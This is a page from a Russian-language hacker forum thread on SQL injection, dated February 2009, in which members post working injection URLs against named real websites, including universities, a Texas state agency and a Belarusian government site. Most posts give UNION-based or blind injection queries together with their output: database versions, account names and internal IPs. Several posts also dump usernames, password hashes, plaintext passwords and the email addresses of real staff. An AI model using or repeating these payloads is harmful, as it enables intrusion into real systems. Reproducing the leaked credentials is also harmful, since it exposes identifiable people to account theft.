ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
Перезагрузить страницу SQL Инъекции
   
Ответ
Страница 781 из 1242 « Первая < 281681731771 777 778 779 780 781 782 783 784 785 791831881 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #7801  
Старый 13.02.2009, 19:13
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.musicer.net/Live%20is%20life.php?sms_kod=-60546'/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16,17/*
6.0.2-alpha-log
ыыы
 
Ответить с цитированием

  #7802  
Старый 13.02.2009, 19:45
f1ng3r
Участник форума
Регистрация: 14.01.2009
Сообщений: 257
Провел на форуме:
1936181

Репутация: 688
Отправить сообщение для f1ng3r с помощью ICQ
По умолчанию
Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11--

Database Version : 4.1.21-standard
Database name : sagu_news
User name : root@192.168.0.2

берем админа:

Код:
http://www.sagu.edu/news/article.php?ID=9999999+union+select+1,concat_ ws(0x3a, user,password),3,4,5,6,7,8,9,10,11+from+mysql.user--
 
Ответить с цитированием

  #7803  
Старый 13.02.2009, 21:19
AkyHa_MaTaTa
Постоянный
Регистрация: 19.03.2007
Сообщений: 684
Провел на форуме:
3152874

Репутация: 1020


Отправить сообщение для AkyHa_MaTaTa с помощью ICQ
По умолчанию
www.russiatourism.ru PageRank: 6 тИЦ: 1800
Код HTML:
http://www.russiatourism.ru/?actionType=getCities&D=-1)+union+select+DISTINCT+concat(table_schema,'.',table_name,'=%3E',COLUMN_NAME,'%3Cbr%3E')+from+INFORMATION_SCHEMA.COLUMNS+--+
админку так и не нашел, может ее и нету.

wap.biz.mts.com.ua

Код HTML:
http://wap.biz.mts.com.ua/tr/rss-feeder?from=/4&pid=1&nid=-38189'+union+select+1,2,3,concat_ws(0x3A,user(),@@version,database()),5,6,7,8+--+
rescue01.gov.by
Код HTML:
http://rescue01.gov.by/news/show.news.cgi?id=-435+union+select+1,2,3,concat_ws(0x3A,user(),database(),version()),5/*
админка на басике авторизации .
Последний раз редактировалось AkyHa_MaTaTa; 13.02.2009 в 22:18..
 
Ответить с цитированием

  #7804  
Старый 13.02.2009, 21:33
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
Цитата:
http://www.circlemichigan.com/member.php?id=109777778840/**/uNiOn/**/seLeCt/**/1,2,3,concat_ws(0x3a,version(),user(),database()), 5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2 3,24,25,26,27--

Database Version: 5.0.67-community
Database name: circlem_db
User name: circlem_webuser@localhost

/home/circlem/public_html/manager/obj/database/mysql.php


Цитата:
http://www.circlemichigan.com/member.php?id=109777778840+UNION+SELECT+1,2,3,AES_ DECRYPT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(id, 0x3a,username,0x3a,hash,0x3a,access)+FROM+circlem_ db.users+LIMIT+5,1),0x3a),0x71),0x71),5,6,7,8,9,10 ,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,2 7--
: 3 : root : 4c60d3c4867b2f1e6935165b4b68130e24276876 : a : 1 : {s:4:"root";b:1;}




Цитата:
http://www.janera.com/janera_words.php?id=140+union+select+1,2,concat_ws (0x3a,version(),user(),database()),4,5,6,7,8--

Database Version: 5.0.67-log
Database name: janera
User name: janera@patton.dreamhost.com


Цитата:
http://www.janera.com/janera_words.php?id=140+UNION+SELECT+1,2,AES_DECRY PT(AES_ENCRYPT(CONCAT(0x3a,(SELECT+CONCAT(username ,0x3a,password,0x3a,email)+FROM+janera.nljr_bouser s+LIMIT+3,1),0x3a),0x71),0x71),4,5,6,7,8--

: Janera:janera : publisher@janera.com
: Farrah:Farrah : fsarafa@janera.com
: Hannah:hannah : hwallace@janera.com
: Tusha:Tusha : TYakovleva@JANERA.com
: Erin:Florio : eflorio@janera.com
: Allison DeFrees : Clementine:Adefrees@janera.com
Последний раз редактировалось spherics; 13.02.2009 в 21:42..
 
Ответить с цитированием

  #7805  
Старый 13.02.2009, 21:54
faza02
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435

Репутация: 1013
По умолчанию
Код:
http://www.macbytes.com/mb.php?catdispid=-12+union+select+1,2,3,version(),5,6,7,8,9/*
5.0.22-log
 
Ответить с цитированием

  #7806  
Старый 13.02.2009, 22:23
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию
http://www.innernet.org.il/printArticle.php?id=-197+union+select+1,2,3,4,5,6,version()/*

version() 4.0.16-log
database() innernet
user() innerdb@zeraim
 
Ответить с цитированием

  #7807  
Старый 13.02.2009, 22:40
M.W.N.N.
Участник форума
Регистрация: 05.01.2009
Сообщений: 191
Провел на форуме:
3020589

Репутация: 240
По умолчанию
http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(versio n(),0x3a,database(),0x3a,user()),4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18

4.1.21-standard
engel_website
engel_website@localhost

http://engel-art.co.il/catalog.php?id=2512+union+select+1,2,concat(id,0x3 a,email,0x3a,password),4,5,6,7,8,9,10,11,12,13,14, 15,16,17,18+from+engel_users
 
Ответить с цитированием

  #7808  
Старый 13.02.2009, 23:13
spherics
Участник форума
Регистрация: 14.01.2008
Сообщений: 174
Провел на форуме:
800953

Репутация: 443
По умолчанию
PageRank = 7

Цитата:
https://sju.ca/people2.php?id=18098097409809670+union+select+1,2, 3,concat_ws(0x3a,version(),user(),database()),5,6, 7,8,9,10,11,12,13,14,15,16--
Database Version: 5.0.38-Ubuntu_0ubuntu1-log
Database name: sjudb
User name: sjuuser@64.235.105.134



PageRank = 5

Цитата:
http://www.contemporaryposters.com/category.php?Category_ID=3798798698750+union+selec t+concat_ws(0x3a,version(),user(),database())--
4.1.22-standard
dsmayer_dsmayer@localhost
dsmayer_contemporaryposters


Цитата:
https://www2.tpwd.state.tx.us/huntwild/hunt/planning/hunt_lease/details.php?id=68751587468760+union+select+1,2,3,4 ,5,6,7,8,concat_ws(0x3a,version(),user(),database( )),10,11,12,13--
4.1.20-log
huntLeaseDefault@localhost
huntlease


Цитата:
http://www.2007.botanyconference.org/engine/search/index.php?func=detail&aid=1809809709840+union+sele ct+1,concat_ws(0x3a,version(),user(),database()),3 ,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,2 2,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38, 39,40,41,42--

5.0.67-community
scientif@localhost
botany2007
 
Ответить с цитированием

  #7809  
Старый 13.02.2009, 23:56
kevmen
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
Провел на форуме:
397889

Репутация: 60
Отправить сообщение для kevmen с помощью ICQ
По умолчанию
Цитата:
http://www.droug.ru/index.php?id=270+and+substring(version(),1,1)=5
version:5


Цитата:
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),8,1))= 64 == @
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),9,1))= 49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),10,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),11,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),12,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),13,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),14,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),15,1)) =49 == 1
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),16,1)) =48 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),17,1)) =46 == .
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),18,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),19,1)) =50 == 2
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),20,1)) =48 == 0
user:drougru@10.10.10.220

Цитата:
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),1,1))= 100 == d
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),2,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),3,1))= 111 == 0
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),4,1))= 117 == u
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),5,1))= 103 == g
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),6,1))= 114 == r
http://www.droug.ru/index.php?id=270+and+ascii(substring(user(),7,1))= 117 == u
database:drougru
 
Ответить с цитированием

  #7810  
Старый 14.02.2009, 01:00
Parserian
Новичок
Регистрация: 19.01.2009
Сообщений: 15
Провел на форуме:
31493

Репутация: 13
По умолчанию
Код:
http://www.savatouristik.ru/index.php?id=-1%20UNION%20SELECT%201,%20concat_ws(char(58),%20user(),%20version(),%20database())%20--
client304@localhost:4.0.27:savatour
 
Ответить с цитированием
Ответ
Страница 781 из 1242 « Первая < 281681731771 777 778 779 780 781 782 783 784 785 791831881 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ